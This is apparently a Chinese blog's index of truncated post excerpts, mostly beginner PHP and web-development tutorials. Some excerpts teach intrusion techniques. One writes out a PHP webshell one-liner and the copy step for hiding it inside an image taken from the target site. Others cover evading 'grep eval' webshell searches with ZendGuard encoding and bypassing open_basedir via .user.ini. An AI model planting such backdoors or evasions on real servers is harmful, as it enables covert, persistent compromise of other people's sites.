Coisini的博客

.开场白 此次所披露的是以下网页中提出的问题所取得的测试结果： http://code.google.com/p/pasc2at/wiki/SimplifiedChinese <?php for ($i=0; $i<255; $i++) { $url = '1.ph' . chr($i); $tmp = @file_get_contents($url); if (!...

我们平时藏匿图片后门是什么流程呢？我们来看一下 0x01 初级的藏匿方法： 1、建立一个eval.php文件，上面加入我们的后门： <?php assert($_POST[feiji]);?> 2、找一张图片1.jpg，最好是从目标网站上下载下来的图片。 3、合并图片和php后门： Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\ht...

0x01. 什么是phar 文件归档到一个文件包。 将一个模块的文件打包成一个phar，这样方便模块整体迁移，只需将phar文件移动过去，其他环境中include即可使用。 类似于java的 .jar 文件。 php 5.3时，为php的C语言扩展，安装php时会默认安装。 0x02. 创建phar文件 phar.readonly = Off 这个参数必须设置为Off，如果为On，表示phar文...

0x00 前言 这片博文将简单的介绍我编写的 PHP 运行时漏洞检测系统 prvd 的检测逻辑， 以及该系统在实际测试中的效果。 0x01 基本知识 在这里我们先介绍几个常用的词语： - source数据来源点，可以是： 网络，例如常规的 Web 参数等 文件系统 数据库 等等其他用户可控或者间接可控的地方 - filter数据过滤处理点，可以是： 编码解码，例如 base64_decode ...

现在很多linux管理员都会一招,grep eval 大法,查找那些年错过的webshell,那些年错过的基友们苦思冥想出了对抗的办法。 ZendGuard是一款php的加密工具,它可以编译php源码变为字节码,类似于java的虚拟机的字节码,然后让zend虚拟机运行字节码,以此来提高php的运行速度,因为不用虚拟机,php运行脚本的方式是读一行代码,运行一行,效率很低,而虚拟机则效率高多了,题...

静态网站：不支持数据交互（后缀html\htm） 动态网站：支持数据交互（动态网站可以存在静态网页） 实现动态网站技术 ASP（后缀asp） PHP（后缀php） NET（读法 dot net）<后缀aspx > JAVA(后缀. jsp) 客户端与服务器端 户端→Http请求→服务端 ↓ （html代码，图片，js，CSS）并解析 ↓ 服务端→Http响应→客户端 端口 端口...

数据库是存放数据的仓库，数据不是直接放到数据库中，数据库中是表，表里面存放数据 萌芽阶段→文件系统（使用磁盘文件来存储数据） 初级阶段→第一代数据库（出现网状模型，层次模型数据库） 中级阶段→第二代数据库（关系型数据库和结构化查询语言） 高级阶段→新一代数据库（“关系-对象”型数据库） 层次模型： 优点：分类管理，如果查询同一类的数据是很方便的 缺点：如果查询多个不是同一类的数据，效率就很...

PHP标记 1.标准规则（通常嵌入到html用） <?php 开始 ？>结束 2.不完整规则 3.历史规则 PHP注释 单行注释：// 或 #（其后面的内容会被忽略） 多行注释： PHP结束符 此处；为语句结束符告诉php解释器echo ‘hello world’是一个整体 ...

PHP-变量名的命名规则 必须用$符号开始 由字母与下划线构成 PHP变量的使用 PHP变量的生命周期 是人为的删除变量（如上unset删除变量） 是脚本执行结束（最后一行代码执行完毕） 预定义变量、系统变量 变量的传值 值传递：将变量的值赋值给另一个变量，两个变量拥有同样的值，但两个变量互不影响 引用传递：将变量指向数据的内存地址赋值给另外一个变量，两个变量指向同一个值，任何一...

PHP常量命名规格 常量名通常用大写字母表示 常量名不需要使用$符号开始 常量名由字母，数字和下划线，其中不能以数字开头 复杂的常量名使用下划线法表示：FAMILY_NAME 常量的命名比变量其实要宽松（不建议） 常量定义 常量的定义通常使用define函数或者const关键字，而且必须在定义的时候就对其赋值 常量的使用 常量一旦定义不能改变，只能在后面使用其初始化...

PHP中数据类型分为三大类八小类 基本数据类型 整形：存储整数数据 浮点型：存储小数数据和超过整形范围的整数数据 布尔型:存储布尔型数据，只有true和false两个值 字符串型：存储字符串数据（最常见） 复合数据类型 数组型：存储数组数据（即多个数据存放到一个变量中0） 对象型：存放对象数据，由类实例化得到（面向对象） 特殊数据类型 资源型：存储外部资源数据（数据库资源/文件资源） ...

定义：类型判断是系统通过指定函数来确定数据类别，给定判定结果为布尔值，是对应类型返回true，不是对应类型返回false 通过系统函数判定数据类型：函数的格式很好记，使用is_开头，后面跟对应数据类型，可以通过操作手册is_进行搜索查询（PHP操作手册.chm->索引-输入is_），以下讲几个常用的判定函数 总结：数据类型判定在实际开发中有着非常重要的地位，因为作为后台语言，要与用户交互，...

1.自动转换： 就是PHP会自动根据数据要参与的运算场景来将不符合条件的数据类型的数据类型的数据转换成目标类型数据，这种操作在PHP代码中绝大多数的时候可以满足开发需求 自动转换不会改变数据本身的数据类型 2.强制转换： 在程序员开发过程中某个特定节点，需要对数据进行最终格式确定，这个时候可以对数据进行强制转换，转换方式是在数据变量前使用（目标数据类型） 前面括号输入想转换的数据类型，然后最好...

赋值运算符 给变量或者常量进行赋值运算：把右边的结果保存到左边 =：最常见的赋值 +=：左边与右边的运算结果（整体）相加，然后再把这个运算结果赋值给左边 -=|*=|/=：与+=一致 =：“.”为字符串连接操作符，表示左边的字符串与右边的字符串连起来后赋值给左边变量 注意：在使用“/=”进行运算的时候，右侧的结果不能为0，否则会报错 ...

注册界面html前端 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> </head> <body> 注册界面 <form action="./login.php" method="pos...

并不只是针对Lnmp的沙盒逃逸，而是.user.ini的设计缺陷达到绕过open_basedir限制，所以是通用的方法。首先来看看最新版LNMP是怎么配置open_basedir的： open_basedir=/home/wwwroot/default:/tmp/:/proc/ lsattr .user.ini ----i----------- .user.ini LNMP的open_ba...